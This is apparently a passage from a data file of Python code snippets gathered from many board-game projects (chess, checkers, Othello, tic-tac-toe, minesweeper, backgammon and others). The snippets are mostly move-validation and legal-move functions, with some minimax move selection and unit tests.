self.board.repr[middle_pos[0]][middle_pos[1]] != self.player_symbol[other_player]:\n\t\t\treturn False \n\t\treturn True", "def test_check_move_with_invalid(self):\n board = [\n [\" \"] * 6,\n [\" \"] * 6,\n [\" \"] * 6,\n [\" \"] * 6,\n [\"\\u25cb\"] * 6,\n [\" \"] * 6,\n [\" \"] * 6\n ]\n valid = self.game.check_move(board, 4)\n self.assertFalse(valid)", "def move_check(self):\r\n \r\n if not self.run:\r\n return False\r\n \r\n if self.get_num_legal_moves() == 0:\r\n SlTrace.lg(\"NO more legal moves!\", \"nolegalmoves\")\r\n ###return False \r\n \r\n if self.new_move:\r\n self.announce_player(\"start_move\")\r\n if SlTrace.trace(\"selected\"):\r\n self.list_selected(\"After start_move\")\r\n self.new_move = False\r\n player = self.get_player()\r\n if player is None:\r\n return False\r\n \r\n return True", "def op_move_preconditions(self):\n\n if(self.next_move != self.FREE):\n return False\n\n return True", "def takeNaiveMove():\r\n\tnotFound=True\r\n\twhile notFound:\r\n\t\tmove=random.randint(1,9)\r\n\t\tif validMove(move):\r\n\t\t\tnotFound=False\r\n\treturn move", "def _isvalidmove(self, from_, to_):\n if self.board[from_].occupant is None:\n print(\"Moving from 
empty square\")\n return False\n piece = self.board[from_].occupant\n\n if piece.color != self.to_move:\n print(\"Wrong color\")\n return False\n\n if self.is_checked:\n if piece.notation != 'K':\n print(\"King is checked!\")\n return False\n\n diff = (\n to_cartesian(to_)[0] - to_cartesian(from_)[0],\n to_cartesian(to_)[1] - to_cartesian(from_)[1]\n )\n if not piece.hopping:\n if self.board.isblocked(from_, to_):\n print(\"Move blocked by other pieces\")\n return False\n\n if self.board[to_].occupant is not None:\n if piece.color == self.board[to_].occupant.color:\n print(\"Cannot capture friendly\")\n return False\n\n if diff not in piece.get_captures():\n print(\"Invalid piece capture\")\n return False\n\n if diff not in piece.get_moves():\n print(\"Invalid piece move\")\n return False\n\n return True", "def _unmove(self):\n (start, end) = self.history.pop()\n self._board[start] = self._board[end]\n self._board[end] = 0\n self.winner = None\n self.player_turn = CheckersGame.opposite[self.player_turn]", "def valid_move(self, row, col):\n if not self._game_over:\n i_row, i_col = row-1, col-1\n #i_row and i_col wil be used to index the board (hence the i)\n (valid, flip_lst) = self._valid_placement(i_row, i_col)\n #print(\"FOR TESTING. Tiles Flipped: \", flip_lst)\n \n if valid:\n #Big Change: You decided to make determining validity\n # and flipping separate operations\n self._flip(i_row, i_col, flip_lst)\n else:\n print(\"\\nPlease enter a valid move!\")\n return False\n\n if self._board_is_full():\n self._game_over = True\n self._set_winner() \n \n self._switch_turn(self._turn)\n if not self._valid_move_exists(): #Check if the other player has any valid moves\n print(\"\\nNo valid moves exist for {0}. {0}'s turn has been skipped\".format(self._turn))\n self._switch_turn(self._turn) #Switch turn back to player before skip was determined\n if not self._valid_move_exists(): #Check if the other player has any valid moves\n print(\"No valid moves exist for {0}. {0}'s turn has been skipped\".format(self._turn))\n print(\"No moves exist for either player. GAME OVER\")\n self._game_over = True\n self._set_winner()\n return False\n\n return True\n elif self._game_over:\n print(\"The game is over. 
No more moves can be made!\")\n #TODO: Replace this^ with an exception later?\n return False", "def test_move_knight_illegally(self):\n self.c.board = [[(0, 0) for i in range(8)] for i in range(8)]\n for piece in [('N', True), ('N', False)]:\n self.c.turn = piece[1]\n self.c.board[4][4] = piece\n dests = [col + row for col in 'abcdefgh' for row in '12345678']\n for dest in dests:\n if dest in ['d6', 'f6', 'c5', 'g5', 'c3', 'g3', 'd2', 'f2']:\n continue\n self.groups['dest'] = dest\n self.assertRaises(\n MoveNotLegalError, self.c._knight_evaluator, self.groups)", "def handle_unmake(self, move):\n# print \"board:handle_make pgn = \" + move.pgn\n if not move: return\n # remove en passant capture\n if move.is_en_passant():\n self.put(move.dst + (8 if move.is_white() else -8), \\\n 'p' if move.is_white() else 'P')\n\n # move rook when castling\n if move.is_castling_short():\n if move.is_white():\n self.move((61,63))\n else:\n self.move((5,7))\n if move.is_castling_long():\n if move.is_white():\n self.move((59, 56))\n else:\n self.move((3, 0))\n\n # now move itself\n self.move((move.dst, move.src))\n \n # recover capture\n if move.is_capture():\n p = move.get_captured_piece()\n if move.is_white(): p = p.lower()\n self.put(move.dst, p)\n\n # Recover promoted piece\n if move.is_promotion():\n self.remove(move.src)\n self.put(move.src, 'P' if move.is_white() else 'p')\n self.update_vars_list()", "def generate_valid_moves(self):\n #make sure we have a valid roll\n if (self.roll != (0,0)):\n #if doubles, need to do 4 moves\n if (self.roll[0] == self.roll[1]):\n #need to seed the initial moveset\n mv = self.board.find_moveable_pieces(self.roll[0], self.player)\n mv2 = []\n #apply the remaining 3 rolls\n for i in range(0,3):\n for mboard in mv:\n mv2.extend(mboard.find_moveable_pieces(self.roll[0], self.player))\n mv = list(set(mv2))\n mv2 = []\n else:\n #need to condisider d1 then d2 and d2 then d1\n d1d2 = self.board.find_moveable_pieces(self.roll[0], self.player)\n d2d1 = self.board.find_moveable_pieces(self.roll[1], self.player)\n d1d2_2 = []\n d2d1_2 = []\n for mboard in d1d2:\n d1d2_2.extend(mboard.find_moveable_pieces(self.roll[1], self.player))\n for mboard in d2d1:\n d2d1_2.extend(mboard.find_moveable_pieces(self.roll[0], self.player))\n mv = d1d2_2\n mv.extend(d2d1_2)\n self.moves = list(set(mv))", "def make_move(self, state):\n emptySpaces = 0\n for row in state:\n emptySpaces = emptySpaces + row.count(' ')\n if emptySpaces > 17:\n drop_phase = True\n else:\n drop_phase = False\n\n move = []\n if not drop_phase:\n best_value = float('-inf')\n best_state = None\n for s in self.succ(state, False, self.my_piece):\n if self.game_value(s) == -1 or self.game_value(s) == 1:\n best_state = s\n break\n currValue = self.Min_Value(state, 0)\n if currValue>best_value:\n best_value = currValue\n best_state = s\n for i in range(len(state)):\n for j in range(len(state[i])):\n if state[i][j]!= ' ' and best_state[i][j]== ' ':\n move.append((i,j))\n if state[i][j]== ' ' and best_state[i][j]!= ' ':\n move.insert(0, (i,j))\n \n # TODO: choose a piece to move and remove it from the board\n # (You may move this condition anywhere, just be sure to handle it)\n #\n # Until this part is implemented and the move list is updated\n # accordingly, the AI will not follow the rules after the drop phase!\n \n\n # select an unoccupied space randomly\n # TODO: implement a minimax algorithm to play better\n \n else:\n best_value = float('-inf')\n best_state = None\n for s in self.succ(state, True, self.my_piece):\n if 
self.game_value(s) == -1 or self.game_value(s) == 1:\n best_state = s\n break\n currValue = self.Min_Value(state, 0)\n if currValue>best_value:\n best_value = currValue\n best_state = s\n for i in range(len(state)):\n for j in range(len(state[i])):\n if state[i][j]== ' ' and best_state[i][j]!= ' ':\n move.insert(0, (i,j))\n \n return move", "def prepare_next_turn(grid):\n empties = get_empty_cells(grid)\n y,x = random.choice(empties)\n grid[y][x] = 2 if random.random() < 0.9 else 4\n return any_possible_moves(grid)", "def make_safe_move(self):\n #iterate through safe moves until you find one that has not yet been played\n for move in self.safes:\n if move not in self.moves_made:\n return move\n #If we make it through the end of the list, return None\n return None", "def legal_moves(player, board):\n return [sq for sq in Othello.squares() if Othello.is_legal(sq, player, board)]", "def action(self):\r\n\r\n\r\n #have we just started?\r\n if self.player_information[\"us\"][\"nTokens\"] == 0:\r\n move = generate_starting_move(self.player_information[\"us\"][\"player_side\"], self.board_array)\r\n return move\r\n\r\n #otherwise do minimax \r\n \r\n #start off with some shallow depth:\r\n if self.turn_no < 5:\r\n depth = 3\r\n else:\r\n depth = 2\r\n \r\n #set a constraint for search depth\r\n if self.total_tokens_on_board < 6:\r\n depth = 3\r\n elif self.total_tokens_on_board < 10:\r\n depth = 2\r\n else:\r\n depth = 1\r\n \r\n #have a time reference\r\n print(f'nthrows: {self.player_information[\"us\"][\"nThrowsRemaining\"]}')\r\n starting_time = int(round(time.time(), 0))\r\n #salvage result from minimax\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, depth, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, True, self.turn_no)\r\n\r\n #clean it up a bit \r\n print(self.board_dict)\r\n #tidy it up\r\n result = result[0]\r\n print(f'pre: {result}')\r\n #in case we get a bad move redo but make it very shallow\r\n if len(result) == 1 or result == (-5, -5):\r\n #force it to return a usable move\r\n counter = 0\r\n while (len(result) == 1) or (result == (-5, -5)):\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, 1, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, False, self.turn_no)\r\n result = result[0]\r\n counter += 1\r\n \r\n #if its taking too long\r\n if counter > 2: \r\n #generate one random possible move to use \r\n allied_tokens = [token for token in self.player_tokens if self.player_tokens[token] == \"us\"]\r\n move_list = generate_moves(self.board_dict, self.player_tokens, self.co_existance_dict, allied_tokens,\r\n self.player_information, self.board_array, True, \"all\")\r\n \r\n \r\n #if there are no moves\r\n if len(move_list) == 0:\r\n if self.player_information['us']['nThrowsRemaining'] > 0:\r\n throws = generate_possible_throws(self.board_dict, self.player_tokens, self.co_existance_dict, self.player_information, \"us\",\r\n self.player_information[\"us\"][\"player_side\"], self.board_array, \"all\" )\r\n result = random.choice(throws)\r\n \r\n else:\r\n result = random.choice(move_list)\r\n print(f'random: {result}')\r\n break\r\n\r\n print(f' inside: {result}')\r\n\r\n print(result)\r\n #otherwise clean it up\r\n if result[0] == 'throw':\r\n final_result = 
(result[0].upper(), result[1], result[2])\r\n else:\r\n final_result = (result[0].upper(), result[2], result[3])\r\n # return final result \r\n return final_result", "def legal_moves(self, player, board):\r\n #go through the whole board and check whether the piece is on the board or not\r\n #num/row size - num%col == num2/row size - num@%col\r\n #num/row size + num%col\r\n moves = list()\r\n opp = self.opponent(player)\r\n #print(board)\r\n for i in self.squares():\r\n if board[i] == core.EMPTY:\r\n for d in core.DIRECTIONS:\r\n endPt = self.find_bracket(i, player, board, d)\r\n if endPt!= None:\r\n moves.append(i)\r\n break\r\n\r\n return moves", "def _is_valid_move(self, vector, current_piece, other_piece):\n return True", "def validate_move(self, move_from, move_to, board):\n\n pass", "def get_legal_moves(self, pos: Position, game_board: GameBoard) -> PossibleMoveSet:\n pass", "def test_legalMoveP_backwards_goose(self):\n rules_obj = rules.Rules(test_mode=True)\n board = gamenode.GameNode()\n startCoordinate = coordinate.Coordinate(3, 1)\n endCoordinate = coordinate.Coordinate(3, 2)\n board.setState(startCoordinate, types.GOOSE)\n actual_result = rules_obj.legalMoveP(board,\n startCoordinate,\n endCoordinate)\n expected_result = False\n self.assertEqual(actual_result, expected_result)", "def _ispinnedmove(self, from_, to_):\n return False", "def valid_move(self, player, move):\n return (True)", "def is_legal_move(player, row_from, col_from, row_to, col_to):\r\n illegal_moves = [(0, 0), (2, 0), (0, 4), (2, 4)]\r\n\r\n \"\"\"special moves that are move available according to diagram\r\n List of tuples to and from values that are not possible\"\"\"\r\n moves_not_permitted = [[(0, 2), (1, 1)], [(0, 2), (1, 3)], [(1, 1), (2, 2)], [(1, 3), (2, 2)]]\r\n row_diff = abs(row_from - row_to)\r\n col_diff = abs(col_from - col_to)\r\n\r\n if player == 'hounds':\r\n\r\n if (row_to >= 0 and row_to < 3 and col_to >= 0 and col_to < 5):\r\n \"\"\"Check if the move is not out of bounds for the board with max col range 4 and row range 3\r\n and then check if it is a legal move\"\"\"\r\n\r\n if board[row_to][col_to] == 0 and (row_to, col_to) not in illegal_moves and row_diff <= 1 and col_diff <= 1:\r\n \"\"\" Check if the position is blank.\r\n Then check if the move is not one of the blank places\r\n Then check if the row difference and column difference isn't more than 1\r\n \"\"\"\r\n if (col_to - col_from) < 0: # no moves to the left of the board\r\n return False\r\n\r\n for item in moves_not_permitted:\r\n if len(set([(row_from, col_from), (row_to, col_to)]).intersection(set(item))) == 2:\r\n \"\"\" If to and from co-ordinates are present in the moves_not_permitted list then return False\"\"\"\r\n return False\r\n else:\r\n pass\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n \"\"\"When player is a hare\"\"\"\r\n\r\n if (row_to >= 0 and row_to < 3 and col_to >= 0 and col_to < 5):\r\n \"\"\"Check if the move is not out of bounds for the board with max col range 4 and row range 3\r\n and then check if it is a legal move\"\"\"\r\n\r\n if board[row_to][col_to] == 0 and (row_to, col_to) not in illegal_moves and row_diff <= 1 and col_diff <= 1:\r\n \"\"\" Check if the position is blank.\r\n Then check if the move is not one of the blank places\r\n Then check if the row difference and column difference isn't more than 1\"\"\"\r\n\r\n for item in moves_not_permitted:\r\n if len(set([(row_from, col_from), (row_to, col_to)]).intersection(set(item))) == 2:\r\n \"\"\" If to and from co-ordinates are 
present in the moves_not_permitted list then return False\"\"\"\r\n return False\r\n else:\r\n pass\r\n return True\r\n\r\n else:\r\n return False", "def check_move(self, move):\n\n if str(move) in self.moves_made:\n return False\n return True", "def possible(state_board,turn):\n\tlegal_moves = [] # list of legal moves as Move objects\n\tfor i in range(1,9):\n\t\tfor j in range(1,9):\n\t\t\tif state_board[i][j] == 0:\n\t\t\t\tif flipper([i,j],turn,state_board) != []:\n\t\t\t\t\t# if there are flipped pieces, it appends this move to\n\t\t\t\t\t# the legal moves and draws it in light greens\n\t\t\t\t\tlegal_moves.append((i,j))\n\t\t\t\t\tdrawPiece((i,j),3)\n\t\t\t\telse:\n\t\t\t\t\t# if it is 0 and is not legal, make sure it is of bgcolor\n\t\t\t\t\tdrawPiece((i,j),0)\n\t\n\treturn legal_moves", "def any_legal_move(player, board):\n return any(Othello.is_legal(sq, player, board) for sq in Othello.squares())", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def is_valid(self, move):\r\n return move > 10 and move < 89", "def legal_move(self, move, state = None):\n if state is None:\n state = copy(self.state)\n else:\n state = copy(state)\n return state[move // state.shape[0], move % state.shape[0]] == 0", "def test_does_not_move(self):\n Herbivore.set_parameters({\"mu\": 0})\n nt.assert_false(self.herb.check_migrate())", "def test_move_knight_legally_blocked(self):\n for piece in [('N', True), ('N', False)]:\n self.c.board = \\\n [[('K', piece[1]) for i in range(8)] for i in range(8)]\n self.c.turn = piece[1]\n self.c.board[4][4] = piece\n for dest in ['d6', 'f6', 'c5', 'g5', 'c3', 'g3', 'd2', 'f2']:\n self.groups['dest'] = dest\n self.assertRaises(\n MoveNotLegalError, self.c._knight_evaluator, self.groups)", "def safe_moves(p, state):\n\n x, y = state['players'][p]['x'], state['players'][p]['y']\n\n moves = []\n actions = [(1, 0, 'east'),\n (-1, 0, 'west'),\n (0, -1, 'north'),\n (0, 1, 'south')]\n for dx, dy, move in actions:\n tx, ty = str(x + dx), str(y + dy)\n if tx not in state['cells'] or ty not in state['cells'][tx]:\n moves.append(move)\n\n return moves", "def make_safe_move(self):\n for i in self.safes:\n if i not in self.moves_made:\n return i\n #raise NotImplementedError", "def is_legal_move(self, house_num):\n return True", "def _check_for_ko(self):\n try:\n if self._array == self._history[-2][0]:\n self._pop_history()\n raise BoardError('Cannot make a move that is redundant!')\n except IndexError:\n # Insufficient history...let this one slide\n pass", "def get_legal_moves(self):\n moves = []\n if self.player_locations[self.whose_turn] is None:\n return self.get_blank_locations()\n matrix = [(1,0), (-1,0), (0,1), (0,-1), (1,1), (1,-1), (-1, 1), (-1,-1)]\n\n for dx, dy in matrix:\n x,y = self.player_locations[self.whose_turn]\n while x+dx <= xdim and x+dx >= 0 and y+dy <= ydim and y+dy >= 0:\n x = x+dx\n y = y+dx\n if self.board[x][y] : break\n moves.append((x,y))\n return moves", "def no_more_move(self):\n if (self.p_no_move + self.c_no_move == 2):\n return True\n return False", "def legalMove(turtles, poles, m, n, count):\n if len(poles[m]) != 0 and (len(poles[n]) == 0 or poles[m][-1] < poles[n][-1]): #one possible legal move btwn m and n\n moveTurt(turtles[poles[m][-1] - 1], n, count)\n 
poles[n].append(poles[m].pop())\n if len(poles[0]) == 0 and len(poles[1]) == 0:\n return\n elif len(poles[n]) != 0 and (len(poles[m]) == 0 or poles[n][-1] < poles[m][-1]): #other possible legal move btwn m and n\n moveTurt(turtles[poles[n][-1] - 1], m, count)\n poles[m].append(poles[n].pop())", "def get_legal_moves(self, player: int) -> np.ndarray:\n stage2 = self.is_stage2()\n action_mask = np.zeros((24, 5, 25), dtype=bool)\n # if stage 1 add set options\n array_board = np.array(self.board)\n if not stage2:\n legal_pos = np.where(array_board == 0)[0]\n for pos in legal_pos:\n if self.is_mill(player, pos, self.board): # current selection completes a mill\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if\n not self.is_mill(-player, opp_p, self.board)] # can't remove opponent in mill\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[pos, -1, opp_pos] = True\n else:\n action_mask[pos, -1, -1] = True # place piece on board\n else:\n from_pos_cands = np.where(array_board == player)[0]\n for from_pos in from_pos_cands:\n mill_cands = [(orient, adj) for orient, adj in enumerate(self.adjacent[from_pos]) if\n adj is not None and self.board[adj] == 0] # TODO added not, need to validate\n if_played_board = self.board.copy()\n if_played_board[from_pos] = 0\n for (orient, adj) in mill_cands:\n if self.is_mill(player, adj, if_played_board):\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if not self.is_mill(-player, opp_p, if_played_board)]\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[from_pos, orient, opp_pos] = True\n else:\n action_mask[from_pos, orient, -1] = True\n\n return action_mask", "def getPossibleMoves(self): # called to get possible positions this piece can go\r\n \r\n moves = {}\r\n\r\n ids = []\r\n\r\n for piece in self.board.pieces.values():\r\n if piece.name == \"empty\":\r\n piece.glow = False\r\n piece.ready = False\r\n\r\n self.piece = self\r\n\r\n def check(direction=\"left\", heading=\"north\", x=None, y=None):\r\n piece = self.piece\r\n if direction == \"left\": x -= 50\r\n else: x += 50\r\n\r\n if heading == \"north\": y -= 50\r\n else: y += 50\r\n\r\n if (x, y) in self.board.pieces: # position is empty\r\n empty = self.board.getPiece((x, y))\r\n empty.glow = True\r\n old, new, obj = (direction, heading), (x, y), piece\r\n identity = self.getRandomID(ids) # get an ID for the move\r\n moves[identity] = old, new, obj\r\n\r\n if piece.isKing: # piece is a king, so go on\r\n check(direction, heading, x, y)\r\n else: # its not empty, so check if its comrade\r\n x1, y1 = x+25, y+25\r\n piece2 = self.board.getPiece((x1, y1))\r\n try:\r\n if piece.isComrade(piece2):# piece is comrade so return\r\n return\r\n else: # piece is not comrade, so check empty\r\n if direction == \"left\": x2 = x1-25-50\r\n else: x2 = x1-25+50\r\n\r\n if heading == \"north\": y2 = y1-25-50\r\n else: y2 = y1-25+50\r\n\r\n if (x2, y2) in self.board.pieces: # its empty, so notify player\r\n empty = self.board.getPiece((x2, y2))\r\n empty.glow = True\r\n empty.ready = True\r\n\r\n old, new, obj = (direction, heading), (x2, y2), piece2\r\n identity = self.getRandomID(ids)\r\n moves[identity] = old, new, obj\r\n\r\n check(direction, heading, piece2.x-25, piece2.y-25)\r\n check(direction, heading, x2, y2)\r\n \r\n # check empty or 
comrade again\r\n if direction == \"left\": x3 = x2-50\r\n else: x3 = x2+50\r\n\r\n if heading == \"north\": y3 = y2-50\r\n else: y3 = y2+50\r\n\r\n if (x3, y3) in self.board.pieces: # positon(address) is empty\r\n return\r\n else: # there is a piece, so check if comrade, stop, if not comrade continue\r\n x3+=25\r\n y3+= 25\r\n\r\n piece3 = self.board.getPiece((x3, y3))\r\n if piece3.isComrade(piece2): # comrades, so stop\r\n return\r\n else: # not comrades, so continue\r\n self.piece = piece3\r\n check(direction, heading, x, y)\r\n\r\n #self.piece = piece2\r\n \r\n #check(direction, heading, x2, y2) # keep searching\r\n else: # its not empty, so return\r\n return\r\n except:\r\n pass\r\n\r\n if self.piece.name == \"white\": direction = \"north\"\r\n else: direction = \"south\"\r\n \r\n check(\"left\", direction, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", direction, self.piece.x-25, self.piece.y-25)\r\n \r\n if self.piece.isKing:\r\n if self.piece.name == \"white\": heading = \"south\"\r\n else: heading = \"north\"\r\n \r\n check(\"left\", heading, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", heading, self.piece.x-25, self.piece.y-25)\r\n\r\n if self.piece.name == \"white\":\r\n eatMoves = self.board.game.thinkEatMoves(moves, \"person\")\r\n if eatMoves is not None:\r\n return eatMoves\r\n\r\n return moves", "def _valid_move_exists(self):\n lst = []\n for i_row in range(self._num_rows):\n for i_col in range(self._num_cols):\n if self._valid_placement(i_row, i_col)[0]:\n lst.append((i_row, i_col))\n\n return lst != [] #If lst != [], then the list has elements -> valid move(s) exist", "def legalMoves(self):\n return [c for c in range(self.getWidth()) if len([r for r in range(self.getHeight()) if self.cell[c][r]==EMPTY])>0 ]", "def prepare_next_turn(grid):\n\tempties = get_empty_cells(grid)\n\ty,x = random.choice(empties)\n\tgrid[y][x] = 2 if random.random() < prob_2 else 4\n\treturn any_possible_moves(grid)", "def make_safe_move(self):\n # This is just a pop of a safe move\n next_moves = self.safes - self.moves_made\n if len(next_moves) != 0:\n move = next_moves.pop()\n self.moves_made.add(move)\n self.mark_safe(move)\n return move\n return None", "def is_valid_move(self, somerow, somecol):\n bool_1 = self.board[somerow][somecol] != 1\n bool_2 = self.num_queens_placed < self.size \n bool_3 = self.attack(somerow, somecol)\n return bool_1 and bool_2 and bool_3", "def legal_move_on(draw, board):\n start, _ = draw(strategies.sampled_from(sorted(board.pieces)))\n end = draw(strategies.sampled_from(sorted(board.movable_from(start))))\n return start, end", "def disable_moves(self):\r\n self.board.disable_moves()", "def valid_move(x, y):\r\n if [x, y] in empty_cells(board):\r\n return True\r\n else:\r\n return False", "def checkLegalMove(self, initialPosition, destinationPosition, colorIndex):\n checkColor = self.grid.REPRESENTATION[colorIndex]\n otherColor = self.grid.REPRESENTATION[1-colorIndex]\n emptyColor = self.grid.REPRESENTATION[2]\n if self.grid[initialPosition] != checkColor:\n print 'The piece you are trying to move is not yours! Please reselect your move.'\n return False\n if self.grid[destinationPosition] != emptyColor:\n print 'The destination position of your move is not empty! Please reselect your move.'\n return False\n if initialPosition == destinationPosition:\n print 'The initial and destination position of your move are the same. 
Please reselect your move.'\n return False\n\n if initialPosition[0] == destinationPosition[0]:\n x = initialPosition[0]\n if (destinationPosition[1] - initialPosition[1]) %2 != 0:\n print 'Invalid move! Please reselect your move.'\n return False\n if initialPosition[1] < destinationPosition[1]:\n for i in range(initialPosition[1]+1, destinationPosition[1], 2):\n if self.grid[(x, i)] != otherColor or self.grid[(x, i+1)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n else:\n for i in range(initialPosition[1]-1, destinationPosition[1], -2):\n if self.grid[(x, i)] != otherColor or self.grid[(x, i-1)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n elif initialPosition[1] == destinationPosition[1]:\n y = initialPosition[1]\n if (destinationPosition[0] - initialPosition[0])%2 != 0:\n print 'Invalid move! Please reselect your move.'\n return False\n if initialPosition[0] < destinationPosition[0]:\n for i in range(initialPosition[0]+1, destinationPosition[0], 2):\n if self.grid[(i, y)] != otherColor or self.grid[(i+1, y)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n else:\n for i in range(initialPosition[0]-1, destinationPosition[0], -2):\n if self.grid[(i, y)] != otherColor or self.grid[(i-1, y)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n # make turns\n print 'Making turns is invalid move! Please reselect your move.'\n return False", "def is_valid_move(x:int, y:int,board_length) -> bool:\n if x < 0 or y < 0 or x == board_length or y == board_length:\n return False\n return True", "def clear_moves(self):\n [x.set_board() for x in self.pieces if x.get_state() == MOVE]", "def execution(move,legal,board,player):\r\n \r\n if player == 1:\r\n if move in legal:\r\n for i in range(0,len(board.white)):\r\n if board.white[i] == move[0]:\r\n board.white[i] = move[1]\r\n if len(move) == 3:\r\n board.black.remove(move[-1])\r\n\r\n else:\r\n print(\"Illegal move, please input a legal move\")\r\n human_move(board,player)\r\n else:\r\n if move in legal:\r\n if len(move) == 3:\r\n board.white.remove(move[-1])\r\n for i in range(0,len(board.black)):\r\n if board.black[i] == move[0]:\r\n board.black[i] = move[1]\r\n else:\r\n print(\"Illegal move, please input a legal move\")\r\n human_move(board,player)", "def is_rook_move_valid(self, from_row, from_col, to_row, to_col):\n # if not on same column or row\n if ((from_row != to_row and from_col != to_col) or\n (from_row == to_row and from_col == to_col)):\n return False\n\n # check if any pieces are in the way of destination\n if from_row != to_row:\n dc = 0\n dr = 1 if to_row - from_row > 0 else -1\n if from_col != to_col:\n dr = 0\n dc = 1 if to_col - from_col > 0 else -1\n dm = abs(to_row - from_row)\n\n retVal = self._any_piece_in_way(from_row, from_col, dr, dc, dm, toRow=to_row, toCol=to_col)\n\n # Casting: Rook invalidation\n if retVal and (from_row == 0 or from_row == 7):\n piece = self.board.squares[from_row][from_col]\n piece_color = self.piece_color(piece)\n if piece_color == \"white\":\n if from_col == 0:\n self.whiteCanCastleQside = False\n elif from_col == 7:\n self.whiteCanCastleKside = False\n else:\n if from_col == 0:\n self.blackCanCastleQside = False\n elif from_col == 7:\n self.blackCanCastleKside = False\n\n return retVal", "def test_not_unopposed(self):\n s1 = self.battle.create_skirmish(self.alice, 2) # Attack 2\n s1.react(self.bob, 1) # 
--Attack 1\n s1.resolve()\n self.assertFalse(s1.unopposed)", "def make_safe_move(self):\n for safe in self.safes:\n if not safe in self.moves_made and not safe in self.mines:\n return safe\n\n return None", "def is_move_valid(move: Move, board: Board, whites_turn: bool) -> bool:\n if out_of_bounds(move[0]) == True or out_of_bounds(move[1]) == True:\n return False\n \n if move[0] == move[1]:\n return False\n\n if is_current_players_piece(piece_at_position(move[0], board), False) and whites_turn == True:\n return False\n elif is_current_players_piece(piece_at_position(move[0], board), True) and whites_turn == False:\n return False\n\n\n if piece_at_position(move[1], board) in WHITE_PIECES and whites_turn == True:\n return False\n elif piece_at_position(move[1], board) in BLACK_PIECES and whites_turn == False:\n return False\n\n\n if move[1] not in get_possible_moves(move[0], board):\n return False\n\n\n test_board = board\n test_board = update_board(test_board, move)\n if is_in_check(test_board, True) and whites_turn == True:\n return False\n elif is_in_check(test_board, False) and whites_turn == False:\n return False\n\n return True", "def is_valid_move(state, move):\n row, col = move\n if row not in [1, 2, 3] or col not in [1, 2, 3]:\n print(\"Invalid move! Specify correct game square!\")\n return False\n if state[row-1][col-1] != '_':\n print('Invalid move! Place your marker on a free square!')\n return False\n return True", "def legal_moves(board,player=None):\r\n \r\n possible_moves = []\r\n moves = []\r\n if player == None:\r\n moves += board.white + board.black\r\n elif player == -1:\r\n moves += board.black\r\n elif player == 1:\r\n moves += board.white\r\n \r\n captured = False\r\n for pos in moves:\r\n if pos[0] == 'A':\r\n m = [-8,-7,1,8,9]\r\n elif pos[0] == 'H':\r\n m = [-9,-8,-1,7,8]\r\n else:\r\n m = [-9,-8,-7,-1,1,7,8,9]\r\n loc = decode(pos)\r\n for i in m:\r\n captured = capture(board, player, possible_moves, pos, loc, i)\r\n canter(board, player, possible_moves, pos, loc, i)\r\n plain(board, player, possible_moves, pos, loc, i)\r\n \r\n if captured:\r\n enemy_list = []\r\n for capturing_move in possible_moves:\r\n if len(capturing_move) == 3:\r\n enemy_list.append(capturing_move)\r\n possible_moves = list(enemy_list)\r\n\r\n return possible_moves", "def verify_legal_move(self, direction):\n for b_x, b_y in self.get_block_positions(self.active_piece.FIGURE):\n\n if direction == \"LEFT\":\n b_x -= 1\n elif direction == \"RIGHT\":\n b_x += 1\n elif direction == \"DOWN\":\n b_y += 1\n else:\n raise ValueError\n\n if b_x < 0 or b_x >= self.WIDTH:\n return False\n\n if b_y < 0 or b_y >= self.HEIGHT:\n return False\n\n if self.board[b_y][b_x] != 0:\n return False\n return True", "def validate_move(move):\n if move[0] in cc.VALID_RANKS and move[1] in cc.VALID_RANKS:\n valid = True\n else:\n valid = False\n return valid", "def test_move_over_past(self):\n b1 = board.Board(self.small_plain)\n start = np.array((3, 3), dtype='int')\n k1 = knight.Knight(b1,start)\n # set move choice 0\n move_choice = 0\n # change the board layout to reflect the move\n k1.execute_move(move_choice)\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # try to go back in strict mode (fail)\n move_choice = 3\n k1.execute_move(move_choice, strict=True)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list 
